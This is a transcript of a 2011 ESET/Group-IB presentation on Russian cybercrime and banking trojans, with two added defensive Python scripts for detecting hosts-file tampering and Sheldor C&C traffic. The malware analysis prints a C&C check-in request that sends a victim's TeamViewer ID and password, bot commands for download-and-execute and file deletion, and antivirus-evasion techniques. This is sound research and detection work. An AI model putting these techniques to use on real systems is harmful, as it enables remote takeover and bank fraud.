Cybercrime in Russia: trends and issues

Russian cybercrime trends in 2010

Transcript

  • 1. Cybercrime in Russia: Trends and issues. Robert Lipovsky, Aleksandr Matrosov and Dmitry Volkov
  • 2. This presentation is confidential and not subject to public disclosure
  • 3. Agenda
    o General cybercrime trends in 2010
    o Most prevalent threats and incidents
    o Reasons for the incidents’ growth
    o Evolution of the cash-out scheme
    o Legal evasions and loopholes
    o Successful criminal prosecutions
    o Analysis of malware used in the attacks
  • 4. Group-IB
    o First and only public company in Russia engaged in digital crime investigation and computer forensics consulting
    o Established in 2003
    o Assistance to law enforcement authorities on particularly difficult cases
    o Partners and researchers in 48 countries
    o Russian HoneyPot-Net project
    o 24/7 monitoring and incident response
  • 5. Cybercrime in 2010
    o Global computer crime market turnover at 7 billion dollars
    o Share of cybercriminals living in Russia estimated at 1.3 billion dollars, ~19% of global crime
    o Cybercriminals from Russian-speaking countries: 2.5 billion dollars, ~36% of global crime
    * Research report "The Russian cybercrime market in 2010: status and trends", http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 6. Most prevalent threats and incidents
    1. Fraud targeted at Russian banks and payment systems
    2. SMS fraud using premium numbers (“winlockers”/LockScreen trojans)
    3. DDoS attacks: growth in number and in power
    4. Unauthorized access to sensitive corporate information
    * Research report "The Russian cybercrime market in 2010: status and trends", http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 7. Incident statistics by Group-IB forensic lab
    [Bar chart: number of incidents in 2009 vs. 2010 by category: unauthorized access, brand attacks, DDoS, bank fraud]
    o Share of cybercriminals living in Russia estimated to increase to 1.8 billion dollars in 2011 (vs. 1.3 billion in 2010)
    o SMS fraud (LockScreens) not shown because the numbers are disproportionally greater
  • 8. DDoS attacks: Growth in number and power
    o Attackers DDoS a bank if a transaction exceeds 150 000 $
    o Most powerful attack: 100 Gb/sec (victims: UkrTelecom, Yandex, EvoSwitch, but the real target was a dating affiliate program)
  • 9. SMS fraud using premium numbers: LockScreen malware
    o If your country is affected, please contact us for information
    o Group-IB developed a case tutorial for this type of investigation
  • 10. Reasons for the incidents’ growth
    o Legal evasions and loopholes
    o Low cost of services in Russia
    o Lack of legal jobs for young IT specialists
    o High profit and minimum investment from cybercrime
    o Low information security vs. high cybercrime group activity
    o Shift of attack targets back to the USSR :)
  • 11. Cost of services in Russia
    o Hacking of a website: from $50
    o Guaranteed hack of a mailbox (Yandex, Mail, Rambler, Gmail): from $45
    o Mobile phone bug: from $5000
    o SMS service bug: from $1000
    o Massive distribution of Trojan and spyware: from $20 (1000 users)
    o Spam services:
      o 400,000 companies: $55
      o 1,800,000 private persons: $100
      o 90,000 companies in St. Petersburg: $30
      o 450,000 private persons in Ukraine: $50
      o 6,000,000 private persons in Russia: $150
      o 4,000,000 emails on @mail.ru: $200
  • 12. Evolution of the Cash-out scheme For amounts up to 40k $
  • 13. Evolution of the Cash-out scheme For amounts 40-200k $
  • 14. Evolution of the Cash-out scheme For amounts over 200k $
  • 15. Chapter 28 of the Penal Code
    o Article 272. Illegal Access to Computer Information. Criminal responsibility: maximum fine of 300 000 RUB or imprisonment for up to 5 years.
    o Article 273. Development, Use and Spreading of Malicious Software. Criminal responsibility: imprisonment for up to 7 years.
    o Article 274. Violation of Rules for the Operation of Computers, Computer Systems or Their Networks. Criminal responsibility: imprisonment for up to 4 years.
  • 16. Legislative initiatives
    o The Committee against Cyber-Crime at the Russian Association of Electronic Communication (RAEC)
    o Improvement of Russian legislation in the field of cyber crimes
    o Anti-SPAM legislation
    o Support against online child pornography
  • 17. Successful criminal prosecutions
    o Group-IB, the Economic Crimes Division and Department K of the MVD busted a group of cybercriminals who developed and spread the “LockScreen” malware
    o 10 cybercriminals have been arrested
  • 18. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  • 19. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  • 20. Successful criminal prosecutions: DDoS case (Cxim)
    o Provided DDoS as a service
    o Arrested for DDoS against Russian banks
    o 8 months in jail
  • 21. Successful criminal prosecutions: Russian bank-fraud case
    o Group #1: stole 600 000$ in a single transaction; case in court; used Win32/Sheldor
    o Group #2: stole 832 000$ (over 1 month); case in court; used phishing sites (hosted on Gogax)
  • 22. Interesting facts about Russian bank fraud
    1. Mass distribution since 2009
    2. Six cybercrime groups attacking Russian banks
    3. Maximum amount stolen at one time from a single bank account: 14 814 820$
  • 23. Interesting facts about Russian bank fraud These guys are still free!
  • 24. Analysis of malware used in the attacks on Russian Internet Banking systems
  • 25. Overview
    o 2010: year of attacks on Russian banks
      o The number of incidents has more than doubled compared to 2009*
    o Over 95%* of incidents involve banking trojans
    o Malware tailored to Russian banks and payment systems
    o However! It can be (and IS) used in other countries as well
    * Research report "The Russian cybercrime market in 2010: status and trends", http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • 26. Malware family share by incidents (%)* (in the last 6 months)
    [Bar chart: share of incidents by malware family, in %]
    * As investigated by Group-IB
  • 27. Most prevalent banking malware in Russia
    o Win32/RDPdoor: backdoor; uses MS Remote Desktop; botnet
    o Win32/Sheldor: backdoor; abuses the TeamViewer application; botnet
    o Win32/Carberp: universal trojan with modules for targeted attacks on Russian banks; botnet
    o Win32/Hodprot: downloader; installs other malware modules; strong encryption of its C&C protocol
    o Win32/Qhost: malware that modifies the hosts file
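Win32/Qhost is listed above only as malware that modifies the hosts file, which is the kind of tampering a responder can audit directly. The script below is an added example (not from the presentation, ESET or Group-IB): it parses a constructed hosts file, skips the loopback and 0.0.0.0 mappings the file legitimately contains, and reports any name pointed at a routable address; the watch-listed domains are made-up `.test` names, not real banks.

```python
"""Check a Windows hosts file for Win32/Qhost-style redirections (added example)."""
import ipaddress

# Constructed sample of a tampered hosts file; the domains are made-up .test names.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   ibank.example-bank.test   www.ibank.example-bank.test
0.0.0.0         ads.example.test
198.51.100.23   login.example-pay.test
"""

# Names that must never resolve through the hosts file (assumed watch list)
WATCH_LIST = {"ibank.example-bank.test", "login.example-pay.test"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs, ignoring comments, blank and malformed lines."""
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield ip, name.lower()


def suspicious_entries(text, watch_list=WATCH_LIST):
    """Return hosts entries that point a name at a routable address.

    Loopback (127.x, ::1) and unspecified (0.0.0.0) mappings are the file's
    legitimate uses and are skipped; watch-listed names are rated 'high'.
    """
    findings = []
    for ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        severity = "high" if name in watch_list else "medium"
        findings.append({"ip": str(ip), "name": name, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print(finding)
```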
  • 28. Win32/RDPdoor
  • 29. Stealing money using MS Remote Desktop… Win32/RDPdoor overview
    o Appearance: first samples detected in April 2010
    o Cost: ~ 2.000$
    o Key feature: abuses components of Thinsoft BeTwin for RDP
    o Most prevalent banking trojan in Russia
    o Bypasses advanced security mechanisms (smartcards, etc.)
  • 30. Win32/RDPdoor detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011)
    [Pie chart; legend: Russia, Ukraine, Kazakhstan, Belarus, Thailand, Bulgaria, United States, Israel, Moldova, rest of the world]
  • 31. Win32/RDPdoor installation
    [Diagram: infected computer (Win32/RDPdoor) ↔ C&C]
    1. Run dropper and send system information
    2. Authentication on C&C and provision of Thinsoft BeTwin for installation
    3. Send status information
  • 32. Win32/RDPdoor installation
  • 33. Win32/RDPdoor installation
  • 34. Stealing authentication data
    1. Install GINA extension DLL
    2. Display fake logon screen
    3. Capture user name & password
    4. Send to C&C
  • 35. Win32/RDPdoor bot commands
    o “P”: change password for BeTwin terminal session
    o “B”: reinstall BeTwinServiceXP module
    o “S”: administration of BeTwin terminal session
    o “R”: install BeTwinServiceXP module
    o “T”: BeTwin backconnection initialization
    o “U”: update main modules and configuration
  • 36. Win32/RDPdoor bot commands
  • 37. Win32/RDPdoor updating: a new dropper with a new configuration embedded is received after the “U” command
  • 38. Win32/Sheldor
  • 39. Win32/Sheldor overview
    o Appearance: first samples detected in June 2010
    o Cost: ~ 2.500$
    o Key feature: abuses the TeamViewer application for remote access
    o Using the TeamViewer cloud adds another level of anonymity
  • 40. Win32/Sheldor detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011)
    [Pie chart; legend: Russia, Ukraine, Kazakhstan, Moldova, United States, China, Belarus, Israel, Georgia, rest of the world]
  • 41. Win32/Sheldor and TeamViewer in action
    [Diagram: infected computer (Win32/Sheldor), TeamViewer cloud, C&C]
    1. Request cloud ID
    2. Set cloud ID
    3. Send ID to C&C: GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
    4. Malicious connection
  • 42. Win32/Sheldor and TeamViewer in action
    1. Request cloud ID
    2. Set cloud ID
    3. Send ID to C&C: GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
    4. Malicious connection
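The check-in request shown on this slide has a recognizable shape: a GET to getinfo.php carrying the TeamViewer ID (digit groups with spaces encoded as %20), the session password and a status flag. As an added example (not from the presentation, ESET or Group-IB), the script below runs that pattern over constructed proxy log lines, decodes the TeamViewer ID and returns one record per hit so a responder can correlate the session; the log format, the C&C host and the client addresses are assumptions.

```python
"""Flag Win32/Sheldor-style C&C check-ins in HTTP proxy logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines, assumed format "<timestamp> <client_ip> <method> <url> <status>";
# the C&C host and client addresses are made up.
SAMPLE_LOG = """\
2011-03-01T10:00:01Z 10.0.0.15 GET http://203.0.113.7/getinfo.php?id=414%20034%20883&pwd=6655&stat=1 200
2011-03-01T10:00:02Z 10.0.0.16 GET http://intranet.example/getinfo.php?id=42 200
2011-03-01T10:00:03Z 10.0.0.17 GET http://www.example.com/index.html 200
2011-03-01T10:05:09Z 10.0.0.15 GET http://203.0.113.7/getinfo.php?id=414%20034%20883&pwd=6655&stat=0 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
# The slide shows the TeamViewer ID as three digit groups ("414 034 883"), spaces encoded as %20.
TV_ID_RE = re.compile(r"^\d{3} \d{3} \d{3}$")


def sheldor_checkin(url):
    """Return decoded id/pwd/stat fields if url has the Sheldor check-in shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/getinfo.php"):
        return None
    q = parse_qs(parts.query)  # parse_qs also decodes %20 back to spaces
    if not all(k in q for k in ("id", "pwd", "stat")):
        return None
    tv_id = q["id"][0]
    if not TV_ID_RE.match(tv_id):
        return None
    return {"host": parts.hostname, "teamviewer_id": tv_id.replace(" ", ""),
            "pwd": q["pwd"][0], "stat": q["stat"][0]}


def find_checkins(log_text):
    """Scan a whole log and return one record per matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line, skip
        ts, client, _method, url, _status = m.groups()
        fields = sheldor_checkin(url)
        if fields:
            hits.append({"ts": ts, "client": client, **fields})
    return hits

if __name__ == "__main__":
    for hit in find_checkins(SAMPLE_LOG):
        print(hit)
```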
  • 43. Under the hood: DLL hooking
    [Diagram: TeamViewer.exe, TV.dll (proxy DLL), TS.dll (original TS.dll)]
  • 44. Malicious DLL call graph
  • 45. Malicious DLL decompilation
    [Screenshot; annotations: functions for calling from original TS.dll, load original TS.dll, hook functions, C&C URL]
  • 46. Win32/Sheldor bot commands
    o exec: download and ShellExecute/CreateThread additional module
    o monitor_off: send command “stop monitoring” to C&C
    o monitor_on: send command “start monitoring” to C&C
    o power_off: ExitWindowsEx(EWX_POWEROFF, SHTDN_REASON_MAJOR_OPERATINGSYSTEM)
    o shutdown: ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_OPERATINGSYSTEM)
    o killbot: delete all files, directories and registry keys
  • 47. Sheldor C&C panel
  • 48. Win32/Carberp
  • 49. Win32/Carberp overview
    o Appearance: first samples detected in February 2010
    o Cost: ~ 9.000$
    o Key feature: advanced information-stealing trojan with plug-ins
    o Customizable to specific banks
    o Man-in-the-browser attacks (IE, Firefox)
    o Grand theft: real cases with millions of $$$ stolen
  • 50. Win32/Carberp detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011)
    [Pie chart; legend: Russia, Ukraine, Spain, United States, Turkey, Kazakhstan, Italy, Mexico, Thailand, Netherlands, Argentina, Belarus, Greece, United Kingdom, rest of the world]
  • 51. C&C panel: Bots by country
  • 52. Win32/Carberp detections over time in Russia (cloud data from ThreatSense.Net, April 2010 – March 2011)
  • 53. Win32/Carberp bot commands
    o update: download new version of Carberp
    o dexec/download: download and execute PE file
    o kill_bot/killuser: delete trojan from the system; delete user’s Windows account (latest version)
    o startsb/loaddll: download DLL and load it into the trojan’s memory address space
    o grabber: grab HTML form data and send to C&C
  • 54. Win32/Carberp self-protection (Win32/Carberp.W vs. Win32/Carberp.X)
    o Bypassing AV emulators: .W: many calls of GUI WinAPI functions; .X: many calls of GUI WinAPI functions
    o Code injection method: .W: ZwResumeThread(); .X: ZwQueueApcThread()
    o Command and string encryption: .W: custom encryption algorithm; .X: 
    o Bot authentication on C&C: .W: ; .X: file with authentication data stored on infected PC
    o API function encryption: .W: custom encryption algorithm; .X: custom encryption algorithm
    o Detection of AV hooks: .W: comparison of the first original bytes; .X: comparison of the first original bytes
    o Bypassing static AV signatures: .W: adds random junk bytes to dropped files; .X: adds random junk bytes to dropped files
    o Hiding in the system: .W: hook system functions; .X: hook system functions
  • 55. Win32/Carberp distribution channels
    [Diagram: control panel; direct distribution; distribution via partners (“partnerka” affiliate program, affiliate ID, exploit pack)]
    o BlackHat SEO
    o Infected blogs
    o etc.
  • 56. Win32/Carberp botnet control panel
  • 57. Win32/Carberp control panel – Bank settings
  • 58. Cab-files with stolen data
  • 59. Stolen data: BS-Client IB system
  • 60. Stolen data: CyberPlat payment system
  • 61. Stolen data: iBank IB system
  • 62. Stolen data: SberBank IB
  • 63. Stolen data: UkrSibBank IB
  • 64. Win32/Carberp summary
    o Cybercrime kit using multiple stealing techniques
    o Since early 2010 targeting other regions too
    o Several independent cybercrime groups involved
    o Joint investigation of Russian police, Group-IB and ESET
  • 65. Summary (Win32/RDPdoor; Win32/Sheldor; Win32/Carberp)
    o First appearance: April 2010; June 2010; February 2010
    o Cost: 2000 $; 2500 $; 9000 $
    o Prevalence: Russia, Ukraine, Kazakhstan; Russia, Ukraine, Kazakhstan; Russia, Ukraine, Spain, USA
    o Remote access: RDP via ThinSoft BeTwin; via TeamViewer; via plug-ins
    o Information stealing: manually; manually; automated
    o Plug-ins: ; ; 
    o Complexity: ; ; 
    o Botnet: ; ; 
  • 66. Conclusion
    o Banks in other countries are becoming new targets of Russian cybercrime groups
    o Attackers respond to new security measures with new methods to bypass them
    o Cybercriminals use stolen money to stay out of jail
    o Disabling C&C servers is not enough to stop them
    o The only way of fighting them is by cooperation
  • 67. Questions
  • 68. Thank you for your attention ;)
    o Robert Lipovsky, ESET, lipovsky@eset.sk
    o Aleksandr Matrosov, ESET, matrosov@eset.sk, @matrosov
    o Dmitry Volkov, Group-IB, volkov@group-ib.ru, @groupib